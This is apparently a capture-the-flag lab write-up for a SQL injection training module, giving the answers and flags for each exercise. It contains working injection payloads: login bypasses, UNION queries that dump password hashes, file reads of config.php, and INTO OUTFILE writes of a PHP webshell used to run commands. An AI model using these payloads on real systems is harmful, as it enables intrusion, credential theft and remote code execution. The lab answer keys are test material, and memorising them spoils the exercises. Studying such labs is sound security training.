CPTS labs - 16 SQL Injection Fundamentals
Authenticate to with user "root" and password "password"
Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database?
| mysql -u root -h $ip -P $port -ppassword
show databases;
Results: employees
What is the department number for the 'Development' department?
| mysql -u root -h $ip -P $port -ppassword
show databases;
show tables;
select * from departments;
Results: d005
What is the last name of the employee whose first name starts with "Bar" AND who was hired on 1990-01-01?
| mysql -u root -h $ip -P $port -ppassword
show databases;
show tables;
select * from employees WHERE first_name LIKE 'Bar%' AND hire_date='1990-01-01';
Results: Mitchem
In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?
| mysql -u root -h $ip -P $port -ppassword
SELECT * from titles WHERE (emp_no > 10000 OR title NOT LIKE 'Engineer');
Results: 654
SQL Injections
Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?
| # Username
tom' OR '1'='1
# Password
Results: 202a1d1a8b195d5e9a57e434cc16000c
Login as the user with the id 5 to get the flag.
| # Username
' or id=5)#
# Leave password empty
Results: cdad9ecdf6f14b45ff5c4de32909caec
Authenticate to $ip:$port
with user "root" and password "password". Connect to the above MySQL server with the 'mysql' tool, and find the number of records returned when doing a 'Union' of all records in the 'employees' table and all records in the 'departments' table.
| mysql -u root -h $ip -P $port -ppassword
show databases;
use employees;
describe employees;
describe departments;
SELECT dept_no,dept_name,NULL,NULL,NULL,NULL from departments UNION select * FROM employees;
Results: 663
Use a Union injection to get the result of 'user()'
| ' ORDER BY 1;#
' ORDER BY 2;#
' ORDER BY 3;#
' ORDER BY 4;#
' ORDER BY 5;#
# With 5 columns it will return an error, so it has 4 columns
# Check out which ones are printed with
' UNION select 1,2,3,4;#
# The UI will give you columns 2,3,4. Inject the code there
' UNION select 1,user(),@@version,4;#
Results: root@localhost
What is the password hash for 'newuser' stored in the 'users' table in the 'ilfreight' database?
| # This comes from the previous exercise...
# Get all the columns from the table users
cn' UNION select 1,column_name,3,4 from information_schema.columns WHERE table_name='users'-- -
# Get id, username and password from table users:
cn' UNION select 1,id,username,password from users-- -
Port Code |
Port City |
Port Volume |
1 |
admin |
392037dbba51f692776d6cefb6dd546d |
2 |
newuser |
9da2c9bcdf39d8610954e0e11ea8f45f |
Results: 9da2c9bcdf39d8610954e0e11ea8f45f
We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.
| cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
Results: dB_pAssw0rd_iS_flag!
Find the flag by using a webshell.
| # Upload a webshell using the file upload.
# 1. User with `FILE` privilege enabled. If our user is root:
SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
# 2. Check that MySQL global `secure_file_priv` variable is not enabled
SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
# Write access to the location we want to write to on the back-end server. In this case we will upload a shell
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
This can be verified by browsing to the /shell.php
file and executing commands via the 0
parameter, with ?0=id
in our URL:
| https://$ip:$port/shell.php?0=id
Now we obtain the flag:
| https://$ip:$port/shell.php?0=cat%20%20/var/www/flag.txt
Results: d2b5b27ae688b6a0f1d21b7d3a0798cd
Skills assessment
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
| # Access to the site http:\\$ip:$port
# Enter as user
' OR 1=1-- -
# Enter anything as password
# The search box is vulnerable to SQL injection. It has 5 columns:
cn' UNION SELECT 1, super_priv, 3, 4, 5 FROM mysql.user WHERE user="root"-- -
# Checking out who we are:
cn' union select "",user(), "", "", ""-- -
# It returns root
# Upload a SHELL
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell.php'-- -
# And now we can execute it:
# Prints the root directory
# Print the flag:
Results: 528d6d9cedc2c7aab146ef226e918396
Last update: 2025-01-26
Created: January 26, 2025 19:15:53